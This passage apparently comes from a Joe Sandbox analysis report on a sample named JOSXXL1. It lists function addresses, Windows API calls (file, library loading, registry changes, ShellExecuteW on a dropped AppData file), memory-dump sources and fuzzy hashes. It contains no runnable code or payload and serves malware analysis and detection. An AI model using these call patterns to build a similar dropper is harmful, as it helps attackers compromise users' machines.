                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e3d564453c2182c562a1b6ec6fca3cbebf624123e7e397cf1c44fef12d2f9579
                                                                                                        • Instruction ID: 46d523a662c7919231ebab16691ba05348c69527c8d8aa00e9837d4009f14a99
                                                                                                        • Opcode Fuzzy Hash: e3d564453c2182c562a1b6ec6fca3cbebf624123e7e397cf1c44fef12d2f9579
                                                                                                        • Instruction Fuzzy Hash: 28714571D00228DBDF28CF98C944BADBBB1FF44305F21816AD856BB281C778AA56DF44
                                                                                                        Function 004031EF Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetTickCount.KERNEL32 ref: 00403203
                                                                                                          • Part of subcall function 0040336E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403119,00000004,00000000,00000000,0040A230,?,00403093,000000FF,00000000,00000000,?,?), ref: 00403236
                                                                                                        • SetFilePointer.KERNELBASE(00006683,00000000,00000000,00414EF0,00004000,?,00000000,00403119,00000004,00000000,00000000,0040A230,?,00403093,000000FF,00000000), ref: 00403331
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FilePointer$CountTick
                                                                                                        • String ID:
                                                                                                        • API String ID: 1092082344-0
                                                                                                        • Opcode ID: 1d6b410ec908590b26d0e6386832776f3ccc0075e6ffb3c2499094a24fe2f275
                                                                                                        • Instruction ID: 2f989109dca0f14896005150ea4b142ee5491df85de4bcb3d025a191183ef828
                                                                                                        • Opcode Fuzzy Hash: 1d6b410ec908590b26d0e6386832776f3ccc0075e6ffb3c2499094a24fe2f275
                                                                                                        • Instruction Fuzzy Hash: 6F317A72500215DFCB109F69EEC496A3BAAF74475A714423FE900B22E0CB799D05DB9D
                                                                                                        Function 00401FC3 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                                                          • Part of subcall function 004052E2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                          • Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                          • Part of subcall function 004052E2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00402E19,00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000), ref: 0040533D
                                                                                                          • Part of subcall function 004052E2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll), ref: 0040534F
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                                        • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                        • String ID:
                                                                                                        • API String ID: 334405425-0
                                                                                                        • Opcode ID: f8ad2080ec2a29a5aa708a75619b44549f0e95cc898dad1c7a4ad7566d460bc2
                                                                                                        • Instruction ID: be163213bf01efc0596bf906ca0f1611b6abe1a57da7fca01b5cdd0d3cce8cbe
                                                                                                        • Opcode Fuzzy Hash: f8ad2080ec2a29a5aa708a75619b44549f0e95cc898dad1c7a4ad7566d460bc2
                                                                                                        • Instruction Fuzzy Hash: 4921C631900219EBCF20AFA5CE48A9E7E71BF00354F60427BF501B51E1CBBD8A81DA5E
                                                                                                        Function 00401B37 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00401BA7
                                                                                                        • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BB9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$AllocFree
                                                                                                        • String ID: Call
                                                                                                        • API String ID: 3394109436-1824292864
                                                                                                        • Opcode ID: f88941aab83e101553d5540b733a17bc25209ec56a178cf788fbb5fa74510e27
                                                                                                        • Instruction ID: b8c0f167556598de95a2943c4b9b6d871f440ab9687b9cc3bbf8d3c3407f6303
                                                                                                        • Opcode Fuzzy Hash: f88941aab83e101553d5540b733a17bc25209ec56a178cf788fbb5fa74510e27
                                                                                                        • Instruction Fuzzy Hash: 76212372A00101EBDB20EFA4CE84E5E77B6AF84324724413BF502B72D1DA78A8219B5D
                                                                                                        Function 0040249E Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000122,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                        • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nstA69B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Enum$CloseOpenValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 167947723-0
                                                                                                        • Opcode ID: 75e403394dc50a8c7c183b4285cc569fa5c7c3c77eca1b14b9eda447d69f20eb
                                                                                                        • Instruction ID: f7d1df95d760c65b2fa1112c316253173fa515e4752bf04adbc10342b079e70f
                                                                                                        • Opcode Fuzzy Hash: 75e403394dc50a8c7c183b4285cc569fa5c7c3c77eca1b14b9eda447d69f20eb
                                                                                                        • Instruction Fuzzy Hash: 12F08171A00204EBEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                                                                        Function 00401E08 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\indvandrings\attraavrdig,?), ref: 00401E52
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Local\indvandrings\attraavrdig, xrefs: 00401E3B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExecuteShell
                                                                                                        • String ID: C:\Users\user\AppData\Local\indvandrings\attraavrdig
                                                                                                        • API String ID: 587946157-3036879226
                                                                                                        • Opcode ID: 158f6bd7a2a94e12e99570158ecabfa588133fd885f5a6516805ca769e2f3cbe
                                                                                                        • Instruction ID: 6f03a3129deb64bde54e8dcd59ef9069cb9fc2feb89592f518e75193bcf3d7b7
                                                                                                        • Opcode Fuzzy Hash: 158f6bd7a2a94e12e99570158ecabfa588133fd885f5a6516805ca769e2f3cbe
                                                                                                        • Instruction Fuzzy Hash: ACF0C236B00100AACB11AFB99E4AEAD33B9AB44724B240577F901F74D5DAFC89419618
                                                                                                        Function 100028A4 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2337909771.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2337832913.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2337963642.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2338036438.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_10000000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFileLastRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 1948546556-0
                                                                                                        • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                        • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                                        • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                        • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                                        Function 004030E7 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,0040A230,?,00403093,000000FF,00000000,00000000,?,?), ref: 0040310C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FilePointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 973152223-0
                                                                                                        • Opcode ID: 018d308ea692820c8829675fa6e34eac859b76ea50dec8528c81e60ce8839cd5
                                                                                                        • Instruction ID: 67d9160ce0aa1e2e76d61ceadf7dfe4382c4b6927c35e4cb0672809be5a1f01d
                                                                                                        • Opcode Fuzzy Hash: 018d308ea692820c8829675fa6e34eac859b76ea50dec8528c81e60ce8839cd5
                                                                                                        • Instruction Fuzzy Hash: 2D316D30200219EBDB109F55DD84ADA3E68EB08359B10843BF905EA1D0D779DF50DBA9
                                                                                                        Function 0040242A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000122,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nstA69B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3677997916-0
                                                                                                        • Opcode ID: 6b8680535f0b85fdc843acb4741b92e467c1e624be2e580cfd2f738fb4bf4c11
                                                                                                        • Instruction ID: e180782171dce9fa6fade52b03e39cf5b39f26fab5a396fb1bde1b9fb5ac53b7
                                                                                                        • Opcode Fuzzy Hash: 6b8680535f0b85fdc843acb4741b92e467c1e624be2e580cfd2f738fb4bf4c11
                                                                                                        • Instruction Fuzzy Hash: 2111A331911205EBDB10CFA0CB489BEB7B4EF44354F20843FE446B72D0D6B85A41DB19
                                                                                                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                        • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3850602802-0
                                                                                                        • Opcode ID: f9407d004fa553bc8aea849b77edd3aa449c930f6ff429ba1ebd3d51c967f122
                                                                                                        • Instruction ID: 26eaddb35cdc13faf07641838d00295e4864c68e45bdd86d166378f51b3c2f7b
                                                                                                        • Opcode Fuzzy Hash: f9407d004fa553bc8aea849b77edd3aa449c930f6ff429ba1ebd3d51c967f122
                                                                                                        • Instruction Fuzzy Hash: 3201F431724210EBE7295B389D04B6A3698E710714F10897FF855F62F1D678CC028B5D
                                                                                                        Function 0040231F Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000122,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseDeleteOpenValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 849931509-0
                                                                                                        • Opcode ID: c59139a464c15aa085cb21755151ec7ff0657f277cb3fbf5c983bdbea560d0af
                                                                                                        • Instruction ID: 60bb5986470d48ad8cc55f7ac878df2b05d68ac6ea48f0c646ace7267bb4d846
                                                                                                        • Opcode Fuzzy Hash: c59139a464c15aa085cb21755151ec7ff0657f277cb3fbf5c983bdbea560d0af
                                                                                                        • Instruction Fuzzy Hash: 88F04F32A04110ABEB11BFB59B4EABE72699B40314F15807BF501B71D5D9FC9902962D
                                                                                                        Function 00406559 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406586
                                                                                                          • Part of subcall function 004064ED: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406504
                                                                                                          • Part of subcall function 004064ED: wsprintfW.USER32 ref: 0040653F
                                                                                                          • Part of subcall function 004064ED: LoadLibraryW.KERNELBASE(?), ref: 0040654F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
